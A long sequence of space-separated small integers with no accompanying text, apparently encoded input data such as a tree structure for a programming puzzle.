3 1 3 1 7 0 7 1 3 5 7 4 9 5 3 3 3 1 3 3 1 2 1 3 1 3 5 1 5 0 10 8 7 1 1 1 3 4 5 6 1 1 1 1 3 1 1 9 0 11 3 7 1 9 8 3 3 1 8 3 8 1 3 1 2 3 3 2 2 3 1 8 0 7 6 2 5 2 1 7 9 1 1 1 1 1 3 3 3 3 5 5 1 1 3 5 1 8 0 6 1 6 1 1 2 4 1 3 3 3 2 1 3 3 1 5 0 10 5 1 1 9 7 9 1 1 9 5 1 2 1 2 2 1 7 0 8 6 6 1 9 4 2 1 5 2 1 2 1 3 1 2 1 1 4 5 2 3 4 1 8 0 11 9 3 7 5 6 1 2 7 9 3 5 1 2 1 1 3 1 2 1 1 7 0 6 1 6 1 6 6 2 1 1 2 3 3 1 3 1 7 0 9 1 1 9 9 4 2 7 9 3 3 3 1 3 2 1 2 3 1 3 2 3 5 1 8 0 6 2 5 1 7 5 4 1 3 1 3 1 3 1 1 1 7 0 7 1 5 4 3 3 1 1 2 1 1 3 2 3 1 1 6 0 9 4 1 9 5 7 1 3 8 4 2 1 3 3 1 1 1 1 1 4 1 3 3 5 5 3 3 4 1 6 0 9 5 8 1 7 7 7 9 1 1 2 1 1 2 2 1 1 5 0 7 3 8 3 2 1 1 8 3 2 1 3 3 1 6 0 10 6 2 2 7 6 8 1 1 6 1 2 2 2 2 3 1 3 2 4 4 3 4 1 5 0 10 8 4 9 2 1 1 2 4 8 7 3 3 1 2 1 1 5 0 9 4 5 7 1 6 7 9 3 5 1 3 1 2 3 1 9 0 10 3 2 6 9 1 7 1 9 2 2 1 1 1 3 1 1 3 3 2 3 1 1 3 3 6 1 9 0 6 1 1 5 9 1 8 1 2 2 1 1 2 1 1 2 1 5 0 9 4 1 7 9 9 3 7 4 1 3 2 1 1 3 1 6 0 10 2 5 3 4 7 4 4 2 1 1 1 2 1 1 3 1 4 2 5 1 2 1 3 4 1 6 0 11 5 6 5 6 8 7 1 3 6 5 6 3 1 1 3 2 3 1 6 0 7 6 7 6 6 1 2 9 3 3 1 3 3 3 1 6 0 10 3 5 8 1 9 7 7 8 1 4 1 1 2 2 1 2 1 5 1 5 3 6 1 5 0 9 3 4 9 3 1 3 7 8 5 1 1 3 1 3 1 8 0 7 4 2 3 1 4 3 7 1 1 2 2 1 1 1 3 1 7 0 7 8 6 7 1 9 7 5 3 2 1 2 3 3 2 5 5 4 3 2 1 2 7 2 5 4 3 4 1 7 0 11 4 9 4 8 1 6 7 4 1 9 2 2 1 2 1 2 2 2 1 8 0 9 9 2 9 1 5 9 1 1 2 2 2 3 3 1 3 1 3 1 8 0 11 1 6 4 7 9 3 3 7 7 9 3 1 3 3 3 2 1 3 1 2 2 1 2 3 5 1 5 0 6 1 9 9 9 4 7 1 2 2 2 1 1 9 0 11 3 1 3 8 4 7 6 7 6 4 3 1 1 3 3 1 3 3 1 1 1 6 0 8 9 9 1 4 1 9 1 7 3 3 2 1 3 3 1 2 1 2 2 3 4 1 8 0 6 5 1 6 9 6 7 2 1 1 3 3 3 1 3 1 7 0 10 7 4 2 7 1 9 7 1 5 9 3 1 2 2 3 2 2 1 9 0 9 8 1 1 9 5 4 1 3 4 2 3 2 1 1 1 3 2 3 4 2 3 1 3 5 1 7 0 10 9 5 3 3 8 1 1 9 2 4 1 1 2 3 3 1 2 1 6 0 10 9 1 1 7 6 8 9 5 6 6 2 3 1 3 3 2 1 7 0 11 1 5 9 7 4 9 6 8 9 5 6 1 3 1 1 2 3 1 1 3 2 4 4 3 6 1 9 0 10 1 1 7 9 7 8 9 2 3 1 2 1 2 3 2 3 2 3 2 1 8 0 9 2 3 1 8 6 8 5 7 9 1 1 3 2 2 2 1 1 1 7 0 10 2 8 7 1 1 6 4 6 3 1 2 1 3 1 3 2 3 3 5 2 1 2 4 2 4 4 1 5 5 3 7 1 5 0 10 8 8 1 8 6 9 6 3 8 6 1 1 1 3 3 1 5 0 9 5 7 9 2 1 1 7 2 1 2 1 1 1 1 1 9 0 9 9 2 1 7 1 8 1 7 9 2 2 2 1 1 2 1 2 2 3 2 4 1 3 3 1 3 6 1 5 0 10 3 2 3 5 2 5 5 1 9 1 2 2 1 1 1 1 7 0 8 1 2 6 6 2 5 9 1 1 1 2 2 1 1 3 1 6 0 10 7 5 4 3 9 1 2 6 7 9 3 1 2 3 3 1 3 2 3 4 5 5 3 6 1 5 0 6 3 1 5 3 1 9 2 3 3 2 1 1 6 0 10 9 9 6 1 5 6 3 5 1 5 2 3 3 1 1 2 1 5 0 7 9 6 3 2 1 3 7 1 2 1 1 1 1 1 2 5 2 4 3 5 1 5 0 7 7 2 5 2 5 7 1 2 1 1 1 3 1 9 0 9 6 2 4 1 5 5 7 8 8 2 3 3 3 3 1 1 1 1 1 6 0 6 2 3 8 1 7 1 1 3 2 1 1 3 1 5 5 3 2 3 5 1 5 0 10 3 3 4 5 7 1 2 1 6 9 3 1 2 3 1 1 6 0 8 2 1 3 3 8 7 1 2 2 3 1 3 2 2 1 9 0 10 3 6 8 1 1 8 4 4 8 4 1 1 3 2 2 2 3 1 3 1 2 2 2 2 4 1 3 5 7 6 7 3 7 3 5 5 3 4 1 5 0 7 3 1 1 6 2 3 1 1 3 2 1 1 1 7 0 6 4 1 4 7 8 7 3 3 1 3 3 3 3 1 6 0 11 7 8 4 3 1 5 2 7 5 3 1 1 1 2 1 2 3 4 1 3 3 3 4 1 7 0 11 4 5 2 6 9 1 6 9 2 5 3 1 3 2 1 3 1 2 1 6 0 10 3 1 4 4 1 3 9 4 7 1 2 3 2 1 2 1 1 7 0 6 1 1 9 2 8 5 3 2 1 1 1 2 1 2 3 1 5 3 5 1 5 0 8 2 8 4 1 6 7 5 7 1 2 3 1 1 1 8 0 11 7 1 1 7 9 8 4 7 4 1 6 3 1 1 3 3 1 1 3 1 8 0 7 3 8 5 4 6 1 4 3 2 3 2 1 2 1 3 1 3 4 3 2 3 7 1 8 0 11 1 7 1 1 2 6 5 3 3 9 4 2 2 2 1 3 3 2 2 1 5 0 10 1 8 8 5 9 2 4 5 7 8 2 2 3 1 1 1 6 0 7 5 1 7 1 4 2 8 1 2 1 2 1 2 3 5 5 3 3 5 2 3 4 1 8 0 7 5 1 5 4 5 9 1 2 3 1 1 1 3 3 2 1 9 0 9 4 9 7 9 7 1 7 4 7 1 1 1 2 3 3 3 2 1 1 8 0 9 9 5 1 1 4 7 5 7 8 2 2 1 1 2 2 1 1 3 4 5 3 5 3 2 4 3 4 5 3 6 1 9 0 10 5 4 8 1 4 1 4 3 2 2 2 2 1 1 1 2 1 2 1 1 8 0 7 5 7 8 7 1 1 4 1 1 2 2 2 1 3 2 1 9 0 7 6 9 1 9 2 7 9 2 1 3 3 2 1 2 1 1 3 4 3 5 2 5 3 6 1 7 0 7 1 8 6 7 6 3 3 1 1 3 2 1 2 3 1 6 0 7 1 1 9 4 7 1 1 1 1 1 1 1 1 1 7 0 10 9 8 6 5 1 4 1 8 2 3 1 2 1 3 2 1 2 1 2 1 3 4 3 3 4 1 7 0 7 1 9 6 5 1 6 6 1 3 1 1 3 3 2 1 9 0 10 2 4 9 4 1 1 1 5 9 8 3 1 1 2 1 3 3 1 3 1 9 0 10 1 1 6 1 5 1 1 2 1 3 1 1 1 2 1 2 1 2 3 3 5 3 3 3 7 1 9 0 6 9 7 5 5 1 1 2 1 2 1 1 2 1 3 3 1 8 0 7 3 7 8 4 6 1 8 3 1 1 3 2 3 1 3 1 9 0 9 4 1 6 6 5 2 8 9 6 3 3 1 1 1 3 3 3 1 4 1 4 4 2 1 3 3 1 1 3 6 5 4 3 7 1 8 0 7 8 1 6 9 1 1 8 1 2 2 3 1 2 1 3 1 6 0 6 1 6 1 5 1 1 1 3 3 2 2 1 1 5 0 6 6 1 8 1 6 6 1 2 2 3 2 3 1 2 3 5 3 4 3 7 1 5 0 6 8 1 6 6 5 2 2 1 2 2 1 1 7 0 11 4 5 5 9 3 1 2 4 5 8 8 2 1 1 3 2 3 1 1 5 0 7 8 4 1 4 1 4 5 3 1 2 3 1 3 5 5 3 3 2 5 3 6 1 5 0 6 2 2 5 8 1 5 1 1 1 2 3 1 7 0 6 3 4 1 4 1 9 2 1 3 3 3 3 2 1 7 0 11 2 1 3 1 6 5 4 6 2 7 5 3 1 1 3 3 3 2 1 1 4 3 2 1 3 4 1 5 0 6 1 7 1 5 6 6 1 3 2 2 2 1 8 0 6 9 3 4 6 3 1 2 1 1 3 3 3 3 1 1 9 0 10 4 7 9 4 9 6 1 4 8 5 3 1 1 2 3 1 1 3 3 1 3 1 1 3 5 1 8 0 7 1 1 7 7 2 9 8 3 1 1 3 1 2 2 3 1 7 0 8 7 5 5 1 1 3 2 3 1 2 3 1 3 3 1 1 5 0 6 1 2 9 3 6 6 3 1 1 1 3 4 4 3 5 4 4 1 2 1 5 3 3 5 1 8 0 10 6 4 4 9 6 9 6 2 1 2 2 1 1 3 1 3 2 3 1 7 0 7 9 6 1 7 2 1 3 3 2 2 3 1 1 1 1 6 0 8 7 9 1 5 5 8 3 4 2 2 1 1 3 3 4 2 5 1 3 3 7 1 5 0 8 7 4 1 7 2 7 4 9 1 1 1 3 1 1 5 0 11 6 5 3 6 9 4 6 8 1 3 8 1 1 1 3 3 1 5 0 11 3 3 3 8 1 1 8 1 1 7 7 2 1 3 1 3 4 1 3 4 2 3 1 3 5 1 9 0 9 5 5 7 1 6 1 3 4 4 1 3 2 2 2 1 3 1 3 1 9 0 7 1 3 8 1 1 1 8 3 1 3 2 3 1 1 1 1 1 9 0 8 3 9 2 1 6 9 4 3 1 1 2 2 2 2 3 1 1 2 3 1 2 4 3 4 1 6 0 10 8 9 2 1 4 5 3 1 8 7 1 1 1 3 3 1 1 7 0 8 6 1 5 5 6 1 8 5 3 3 3 3 1 3 1 1 5 0 9 5 1 4 9 6 8 5 5 2 1 2 3 1 3 2 4 5 2 3 7 1 9 0 6 1 1 8 1 1 1 1 3 1 1 1 3 3 1 1 1 5 0 7 1 5 7 5 2 2 1 2 3 1 2 3 1 8 0 8 5 1 3 1 8 3 7 1 3 2 1 2 2 1 2 2 2 1 1 4 5 1 3 2 1 1 4 4 3 5 1 6 0 9 1 8 2 2 9 1 1 8 3 3 1 3 1 1 3 1 7 0 6 2 8 9 1 9 4 1 1 1 2 3 1 1 1 8 0 9 6 4 6 3 1 5 8 5 1 1 3 3 1 2 2 3 3 4 3 1 3 1 3 5 1 7 0 11 8 1 6 9 6 3 5 5 7 3 3 3 2 2 1 3 2 1 1 7 0 8 4 7 4 7 7 5 1 7 3 1 3 3 3 1 1 1 6 0 8 1 7 7 7 2 7 1 7 2 3 2 1 3 2 3 5 2 1 2 3 7 1 8 0 10 1 4 7 6 4 7 1 7 5 6 1 2 2 3 1 2 2 3 1 7 0 7 5 4 8 7 1 7 8 2 2 1 2 1 1 1 1 7 0 10 3 1 1 5 8 6 6 4 1 8 3 3 3 1 1 2 3 5 1 5 5 4 4 5 3 7 1 5 0 6 7 9 9 9 1 6 3 1 2 1 3 1 9 0 11 1 8 7 5 9 2 1 2 1 8 9 3 1 1 3 2 2 3 2 2 1 7 0 10 6 1 4 2 4 8 7 9 1 6 1 3 3 2 1 3 3 3 2 2 5 4 2 4 5 6 3 3 5 4 3 7 1 8 0 9 1 4 6 1 9 5 3 3 4 1 3 1 1 3 3 2 3 1 8 0 11 6 8 7 3 6 9 6 1 6 2 5 1 1 2 3 1 1 1 3 1 7 0 11 1 3 8 8 6 5 4 7 8 4 3 1 3 1 2 1 1 1 1 5 4 3 4 5 2 3 6 1 7 0 10 3 6 1 1 6 2 3 2 9 3 2 1 1 3 1 1 2 1 5 0 9 9 2 2 2 4 9 1 3 1 1 3 1 1 3 1 9 0 10 1 9 5 7 4 5 6 8 5 1 2 1 3 1 1 1 2 2 1 2 1 3 5 1 2 3 7 1 8 0 10 5 8 1 8 5 3 7 7 1 4 1 3 3 1 1 3 3 2 1 8 0 11 3 8 1 4 3 7 4 2 8 1 5 1 3 2 3 1 1 1 3 1 6 0 8 1 5 9 7 2 3 3 1 2 3 1 2 2 1 4 2 3 3 4 1 5 3 4 1 8 0 11 5 6 1 3 2 4 8 1 4 8 8 2 1 3 3 1 1 2 2 1 7 0 6 3 2 5 1 3 2 2 1 2 1 1 1 3 1 6 0 8 3 7 1 6 6 7 2 5 1 2 1 1 1 3 1 4 1 4 3 4 1 6 0 11 1 1 1 3 6 5 3 1 9 9 5 3 3 1 3 2 2 1 9 0 6 1 3 8 5 3 6 2 1 1 2 1 3 2 3 1 1 8 0 11 8 3 2 1 3 5 4 8 1 8 8 2 1 1 1 3 3 1 1 4 3 1 2 5 2 2 3 4 3 3 4 1 7 0 9 3 4 9 9 1 8 3 7 1 2 1 3 3 1 1 2 1 7 0 9 1 9 1 7 8 5 2 9 7 1 2 1 2 2 3 1 1 7 0 11 3 1 1 2 4 7 8 1 2 1 6 1 2 3 3 3 1 1 4 2 3 3 3 5 1 9 0 7 4 4 4 1 6 7 7 2 2 1 1 1 3 1 1 3 1 8 0 8 1 1 2 8 3 2 1 8 1 2 1 1 1 1 3 1 1 9 0 8 3 7 8 7 2 4 1 7 2 1 2 1 3 2 1 2 1 1 5 1 3 3 3 6 1 6 0 7 1 6 1 7 4 2 2 1 1 1 1 3 2 1 9 0 8 5 9 7 1 4 7 2 3 3 3 1 3 3 1 2 3 2 1 6 0 6 2 1 9 4 2 4 1 3 2 2 2 1 3 3 3 3 1 3 3 4 1 5 0 10 3 6 3 1 2 1 9 5 9 2 1 3 1 1 1 1 5 0 10 6 7 2 2 9 5 4 1 1 2 1 1 1 1 1 1 9 0 6 8 1 7 2 7 1 1 1 1 1 3 2 2 2 1 1 3 3 1 4 1 2 3 4 3 7 2 4 3 3 4 1 5 0 7 9 7 8 7 1 1 6 1 1 2 1 2 1 9 0 8 1 9 5 4 9 5 6 6 1 1 2 2 2 3 3 1 3 1 9 0 11 1 1 7 8 8 7 7 4 1 4 5 1 3 3 3 1 3 1 1 3 2 2 5 2 3 4 1 8 0 8 6 4 2 1 3 4 7 4 1 3 3 1 2 2 1 3 1 9 0 8 2 5 9 1 2 6 4 5 1 2 3 3 2 3 2 1 2 1 7 0 7 5 7 4 8 7 1 9 3 2 2 1 3 2 1 3 2 2 1 3 5 1 8 0 11 9 7 1 6 9 3 9 7 9 2 3 1 2 2 1 1 2 3 2 1 5 0 6 6 1 9 9 4 1 1 3 1 1 2 1 9 0 8 1 1 2 9 9 1 1 8 2 3 3 1 1 3 2 2 1 4 1 2 2 2 3 6 1 9 0 6 7 3 1 9 8 3 2 2 1 2 3 3 2 3 3 1 9 0 9 7 5 3 3 8 4 1 5 1 1 2 1 1 1 3 1 1 1 1 5 0 11 2 1 9 1 6 3 1 1 1 2 3 1 3 3 3 3 3 1 2 2 4 3 4 2 6 4 3 3 7 1 6 0 8 1 9 3 1 6 6 1 8 3 3 3 1 1 1 1 6 0 9 1 8 1 4 3 1 9 8 5 3 3 3 1 3 2 1 6 0 9 5 6 4 3 9 7 1 8 7 3 2 3 2 1 3 2 4 2 5 2 5 3 3 4 1 6 0 8 6 2 5 7 1 5 3 5 2 1 1 3 3 3 1 6 0 6 6 8 4 1 5 4 2 3 2 1 1 2 1 9 0 7 3 3 1 1 8 2 8 3 1 1 3 2 3 1 1 3 5 1 1 3 3 6 1 6 0 7 1 6 3 6 5 6 9 1 2 3 1 3 2 1 5 0 7 5 8 6 2 6 1 8 2 2 3 1 1 1 8 0 6 1 8 6 9 2 2 2 1 3 3 2 1 1 1 4 3 2 4 1 5 3 4 1 7 0 9 5 8 6 6 1 4 1 4 2 1 2 2 2 1 1 1 1 7 0 10 5 3 5 7 7 2 7 7 6 1 1 2 1 1 3 3 1 1 5 0 6 3 3 1 8 7 1 2 2 2 1 3 4 4 3 2 4 2 1 5 3 3 5 1 5 0 10 6 3 7 1 5 1 3 1 9 5 2 1 3 3 1 1 7 0 8 2 7 5 1 6 4 7 8 1 2 3 3 2 1 2 1 6 0 6 6 7 8 6 1 2 1 2 1 3 1 3 5 3 5 1 3 3 4 1 8 0 9 9 1 6 1 4 8 6 6 7 3 1 3 3 2 1 3 1 1 9 0 6 6 4 2 1 1 1 3 3 1 1 3 3 2 1 3 1 5 0 10 3 7 5 1 4 9 7 5 8 3 3 3 3 1 3 5 1 3 4 3 7 1 8 0 9 1 8 9 9 1 9 5 5 4 1 1 2 3 3 2 2 2 1 7 0 8 4 1 8 4 6 9 8 8 1 1 1 2 3 2 3 1 8 0 10 1 3 8 7 3 8 2 9 8 3 1 3 1 2 3 3 2 1 2 1 1 4 4 4 4 3 4 1 7 0 7 5 4 1 8 1 4 3 3 1 1 1 2 3 1 1 6 0 8 2 7 1 3 6 4 8 4 1 1 1 3 3 1 1 6 0 11 1 5 3 1 7 6 7 4 5 1 9 2 1 3 3 1 3 1 2 4 3 3 4 1 9 0 10 2 1 6 7 2 1 3 7 5 3 1 1 1 3 2 3 1 3 3 1 8 0 11 8 3 1 7 4 8 4 3 1 6 1 1 1 2 2 3 1 1 1 1 6 0 10 5 4 5 1 3 2 2 1 3 7 3 1 3 3 3 1 3 5 5 2 4 6 1 4 5 3 5 1 8 0 9 2 2 1 5 1 7 9 3 7 1 2 3 1 1 3 1 3 1 8 0 11 9 7 2 3 6 6 9 1 1 1 9 3 1 2 2 1 1 1 3 1 7 0 11 7 8 4 1 4 7 7 2 3 9 2 3 1 1 2 2 2 2 4 5 3 3 1 3 4 1 9 0 9 5 3 1 8 1 5 5 4 4 1 3 2 1 3 3 3 1 1 1 5 0 7 5 1 1 6 8 7 8 2 3 3 1 3 1 7 0 11 1 9 5 2 1 2 5 9 7 8 3 3 3 3 3 1 2 1 4 1 1 5 3 5 1 6 0 11 6 6 9 5 5 1 9 1 2 3 1 1 1 1 2 1 1 1 5 0 6 5 1 8 3 1 4 2 3 1 3 1 1 6 0 8 8 1 4 6 8 3 1 3 3 2 3 2 1 2 3 5 4 5 1 3 4 1 6 0 9 5 2 8 7 1 8 3 1 2 1 1 1 3 1 3 1 9 0 7 4 6 9 1 9 9 2 2 1 3 1 3 2 2 1 3 1 9 0 10 1 1 4 4 6 3 4 3 5 7 1 3 3 1 1 3 1 1 3 1 2 5 3 4 2 3 3 3 4 3 3 5 1 6 0 7 2 5 1 2 6 5 1 1 1 1 1 1 1 1 7 0 10 6 5 9 8 2 3 1 6 4 4 2 2 2 3 1 2 3 1 9 0 11 5 3 8 1 7 5 3 3 5 6 9 3 3 2 3 1 3 2 2 1 2 1 2 3 1 3 6 1 9 0 8 4 5 5 1 8 1 1 2 3 3 1 3 2 2 3 1 3 1 7 0 8 1 7 5 9 9 5 8 9 3 3 2 2 1 2 3 1 7 0 8 1 9 7 7 8 3 4 1 1 2 1 2 3 2 2 1 3 2 1 3 4 3 7 1 8 0 9 1 5 3 1 5 7 9 4 7 1 3 3 1 1 2 3 3 1 5 0 9 7 7 4 1 7 1 5 2 2 1 3 1 2 2 1 8 0 11 8 8 9 4 3 1 3 5 4 2 4 1 1 2 3 3 3 1 1 4 1 1 5 4 2 1 3 6 1 7 0 7 2 6 9 1 4 2 2 3 2 2 3 3 1 3 1 6 0 8 9 1 8 3 6 6 3 8 3 1 1 2 1 3 1 7 0 6 9 6 1 1 9 1 3 1 2 2 2 2 1 5 2 5 4 5 1 2 2 2 4 5 3 6 1 8 0 10 9 4 8 1 7 5 2 7 4 9 1 3 2 1 2 3 2 3 1 9 0 9 4 7 2 3 5 4 3 6 1 2 1 3 3 1 1 2 3 3 1 8 0 10 6 1 3 3 9 3 8 6 2 5 1 2 3 2 1 3 1 1 3 2 1 2 2 3 3 6 1 5 0 9 6 9 1 3 7 7 9 1 6 1 1 3 1 1 1 7 0 9 7 3 1 1 5 7 8 4 2 2 2 2 1 3 1 2 1 9 0 8 4 1 7 2 1 9 4 7 2 2 3 1 1 1 1 2 3 4 3 1 1 2 2 3 7 1 6 0 6 6 6 7 8 1 6 3 1 1 2 1 1 1 9 0 11 1 3 1 8 5 3 2 7 8 9 8 1 2 1 1 2 2 1 3 2 1 6 0 8 7 1 4 8 3 4 1 1 1 1 1 3 2 1 2 1 2 4 2 3 1 3 4 1 6 0 10 7 9 5 6 8 5 9 1 5 1 2 3 1 1 2 3 1 8 0 11 1 1 1 1 2 8 9 1 5 6 9 2 2 1 2 3 1 3 2 1 8 0 9 8 2 1 9 7 4 6 5 1 2 1 1 1 1 2 2 2 1 3 3 4 3 1 4 2 2 5 4 3 5 1 7 0 6 4 1 7 1 5 2 1 3 1 1 2 1 1 1 9 0 7 6 1 2 6 3 8 7 1 2 2 3 3 1 2 3 1 1 8 0 9 9 3 4 7 4 5 1 8 7 1 2 1 2 1 2 3 3 5 3 1 3 4 3 6 1 6 0 10 1 5 6 4 5 1 6 1 1 3 3 1 2 2 1 3 1 7 0 9 2 4 5 1 5 8 8 5 8 1 1 2 1 1 2 2 1 9 0 11 2 5 5 7 1 7 7 1 1 8 4 1 2 3 2 2 1 3 3 3 4 1 1 5 2 1 3 5 1 6 0 10 9 5 5 8 1 7 9 6 5 8 1 2 2 1 3 1 1 5 0 6 4 9 6 1 1 3 1 3 3 1 2 1 6 0 7 9 2 4 1 2 3 5 1 1 2 1 1 1 2 5 1 2 3 3 4 1 8 0 7 4 5 8 1 8 5 4 1 1 1 2 1 1 2 3 1 6 0 7 7 8 7 6 1 1 3 3 1 1 1 3 3 1 8 0 7 1 3 1 2 3 8 7 2 1 1 1 2 1 1 1 5 3 1 4 3 7 1 6 0 6 1 9 3 1 3 5 3 2 1 1 3 1 1 8 0 6 8 6 8 6 1 5 3 1 3 2 1 3 1 2 1 7 0 6 1 8 7 2 1 5 1 1 1 1 2 2 1 5 1 3 2 4 4 1 7 2 2 4 7 2 6 2 5 3 3 6 1 5 0 7 4 1 7 5 2 4 5 1 1 2 2 1 1 9 0 10 3 1 1 5 3 5 5 4 2 2 1 1 1 2 1 3 1 2 3 1 5 0 6 2 5 9 7 1 4 3 1 1 3 1 2 4 3 1 3 2 3 6 1 7 0 9 6 4 5 3 1 4 5 9 9 1 3 3 2 1 2 1 1 5 0 10 3 5 1 3 2 7 2 1 7 9 1 2 1 3 1 1 7 0 8 1 5 3 8 1 1 6 8 3 2 2 1 2 2 1 4 3 1 2 1 4 3 4 1 7 0 6 8 2 3 5 8 1 1 1 1 1 3 1 3 1 9 0 7 6 5 1 9 9 8 8 1 3 3 1 3 1 3 1 3 1 5 0 10 8 6 3 9 1 4 5 1 5 5 1 3 1 1 1 4 1 1 5 3 6 1 5 0 11 5 2 3 6 1 5 3 5 1 4 2 2 1 2 3 1 1 6 0 6 4 6 6 1 6 2 1 2 2 1 1 2 1 7 0 10 1 8 4 2 1 8 3 9 6 2 1 1 3 1 2 2 1 4 1 1 3 2 4 3 6 1 7 0 10 2 8 6 3 4 2 4 1 9 5 3 3 2 1 3 1 2 1 8 0 8 6 7 8 6 6 3 2 1 3 1 3 3 3 1 2 2 1 6 0 8 9 9 1 2 3 1 9 1 1 1 3 3 3 2 4 3 4 4 5 3 5 1 6 5 4 3 5 1 6 0 7 7 5 8 1 1 4 8 1 2 2 2 1 2 1 6 0 7 6 4 3 1 7 1 3 3 1 1 3 3 1 1 9 0 9 1 7 8 1 2 9 1 8 7 3 2 1 3 1 1 1 1 1 3 3 3 2 3 3 5 1 9 0 9 1 9 9 3 4 1 5 7 4 3 1 3 1 3 1 1 3 2 1 5 0 8 3 8 9 4 6 1 5 2 3 1 2 3 1 1 8 0 7 1 4 7 8 6 8 3 2 3 1 1 1 3 2 1 2 4 2 5 3 3 6 1 6 0 8 8 1 6 5 6 3 5 5 3 1 1 1 3 3 1 7 0 8 8 1 9 8 4 9 8 6 2 2 1 1 3 3 1 1 6 0 10 3 4 2 3 1 1 1 3 2 7 1 1 1 1 2 2 2 1 3 5 4 4 3 7 1 6 0 7 3 1 8 7 4 5 1 2 1 1 1 2 1 1 6 0 8 6 6 7 3 5 6 4 1 2 1 2 1 3 2 1 9 0 9 2 5 4 1 2 8 6 9 1 3 3 3 1 1 3 1 1 3 3 2 5 5 3 2 3 3 7 1 5 0 6 1 5 5 1 3 1 1 3 1 3 3 1 7 0 8 8 1 1 6 7 6 8 8 2 1 2 1 1 3 1 1 9 0 10 1 3 5 6 5 5 6 1 5 1 1 1 2 1 2 2 1 1 3 3 1 2 1 5 2 4 7 7 1 6 5 3 3 5 1 9 0 7 2 2 4 4 1 8 8 1 1 2 2 3 1 3 2 3 1 5 0 8 9 6 5 9 5 9 1 8 1 3 2 1 1 1 5 0 10 4 2 3 7 8 6 8 8 2 1 1 2 3 3 1 5 4 1 3 2 3 7 1 9 0 8 7 3 1 4 9 8 1 9 1 1 1 3 3 2 1 2 1 1 5 0 8 8 9 4 4 9 5 4 1 1 1 3 2 3 1 9 0 11 1 4 6 3 4 1 9 6 3 6 5 2 3 2 1 1 3 2 1 1 2 3 2 4 2 2 4 3 7 1 7 0 7 3 2 4 4 5 1 1 1 2 3 2 1 3 2 1 6 0 6 2 1 5 4 9 7 2 3 1 1 1 1 1 6 0 6 4 4 5 1 2 1 3 2 1 3 1 2 5 2 3 4 1 1 3 3 7 1 8 0 7 7 1 6 9 6 1 9 1 2 1 2 3 1 2 1 1 6 0 7 8 4 1 2 1 3 7 1 1 3 1 1 3 1 7 0 7 4 9 1 6 1 6 7 3 1 1 1 2 1 1 2 3 2 3 1 3 5 3 6 1 8 0 7 9 1 1 6 4 8 5 3 2 3 2 3 2 2 1 1 8 0 6 9 6 1 6 3 4 1 2 2 2 1 3 2 3 1 6 0 8 6 6 9 1 6 5 3 3 1 1 3 2 1 1 1 3 2 4 2 2 2 6 3 4 4 3 4 1 9 0 7 5 2 5 9 8 1 5 1 1 3 1 3 2 1 2 1 1 6 0 11 8 4 2 2 2 7 4 2 6 1 1 1 3 3 1 3 1 1 7 0 10 2 3 8 2 7 8 5 7 1 2 1 1 2 1 1 3 1 2 2 4 3 3 6 1 7 0 7 5 2 3 1 1 3 4 1 1 1 2 3 1 2 1 6 0 11 4 6 9 1 9 1 6 2 6 2 4 2 1 1 2 2 3 1 6 0 7 7 8 5 3 5 1 3 1 1 1 2 3 1 5 1 1 2 2 5 3 6 1 6 0 11 6 4 3 8 3 7 8 8 9 1 4 2 3 1 3 1 3 1 7 0 10 2 9 5 2 7 7 6 9 1 6 2 1 1 2 3 1 1 1 8 0 9 7 5 1 6 5 1 3 2 3 1 1 1 1 1 2 2 3 4 4 2 4 3 2 3 5 1 5 0 6 8 8 4 1 1 4 1 2 1 2 3 1 8 0 9 2 5 2 4 1 3 1 1 3 3 3 3 3 1 2 1 3 1 9 0 8 6 2 1 2 1 6 9 4 1 1 3 3 2 2 1 3 3 2 1 2 2 2 6 3 5 1 5 4 3 6 1 6 0 10 4 8 1 4 1 1 8 1 9 6 2 2 2 3 1 1 1 8 0 8 1 9 8 5 8 8 9 1 2 2 2 3 1 2 2 1 1 6 0 9 2 3 1 4 9 1 8 1 8 3 2 2 1 1 1 4 2 4 5 1 2 3 4 1 7 0 6 2 5 1 5 2 3 3 1 2 3 1 2 3 1 6 0 9 5 1 8 8 2 6 2 3 2 2 2 3 2 1 1 1 6 0 10 1 9 9 7 8 5 7 4 8 4 3 2 2 1 1 1 4 2 3 4 3 5 1 7 0 7 1 5 8 2 1 4 2 2 3 1 3 1 3 1 1 5 0 7 9 7 6 6 3 1 6 1 2 1 2 3 1 7 0 8 3 7 1 7 9 6 9 7 3 1 1 1 3 1 2 3 4 3 4 5 3 5 1 7 0 10 4 9 7 4 1 1 7 1 8 4 2 3 3 3 2 3 1 1 8 0 7 5 3 4 1 8 1 9 1 2 3 2 1 1 2 2 1 6 0 11 5 1 8 5 7 7 2 7 7 9 1 3 3 1 2 1 1 3 1 5 5 2 3 7 1 5 0 6 5 1 9 1 6 4 3 1 1 3 1 1 9 0 8 9 4 6 1 8 7 9 1 2 3 3 1 1 2 2 2 3 1 8 0 8 7 9 1 8 9 7 4 8 2 1 2 2 3 2 1 3 3 4 1 2 1 1 2 2 3 1 6 5 4 3 5 1 5 0 6 3 6 1 4 7 1 2 2 2 3 1 1 5 0 8 7 1 1 8 5 8 4 9 2 2 1 3 1 1 5 0 10 3 4 6 9 8 7 4 9 6 1 1 1 3 1 2 5 4 4 3 3 3 5 1 9 0 11 5 2 7 1 3 8 4 2 9 5 1 1 1 3 2 1 1 2 3 3 1 5 0 7 1 1 8 3 4 1 1 1 1 3 2 1 1 7 0 8 7 3 2 2 1 8 6 7 1 3 2 3 3 1 1 3 5 3 3 3 3 7 1 8 0 10 1 2 8 4 1 1 9 9 9 7 3 1 2 1 1 3 1 1 1 5 0 10 5 5 5 4 1 4 8 4 8 6 3 2 2 1 1 1 8 0 7 2 5 3 1 5 4 7 2 1 1 3 2 1 3 2 4 2 3 2 1 3 2 3 4 1 6 0 11 4 3 5 6 6 5 9 1 5 6 4 1 1 1 3 2 2 1 8 0 11 9 2 1 4 1 1 5 9 8 2 7 2 1 1 1 2 1 3 2 1 7 0 10 7 8 7 6 2 1 5 3 4 2 1 1 1 2 1 1 3 4 2 4 2 3 5 1 8 0 8 8 6 7 1 7 5 8 7 3 1 3 2 1 3 1 1 1 9 0 6 4 3 1 1 8 7 1 3 3 2 1 2 1 1 1 1 8 0 7 3 8 1 4 9 4 6 2 1 1 3 2 1 3 1 3 1 4 3 3 4 1 1 5 1 4 7 2 5 3 3 4 1 9 0 9 5 8 4 8 8 1 7 2 1 1 3 1 1 3 3 1 1 3 1 6 0 11 1 3 3 7 5 2 6 1 4 2 5 1 1 2 1 1 3 1 8 0 6 7 6 1 7 1 7 1 1 1 3 1 2 1 2 3 5 3 2 3 5 1 9 0 7 7 2 3 4 1 1 9 1 3 3 1 3 1 1 2 3 1 5 0 7 8 6 3 2 6 1 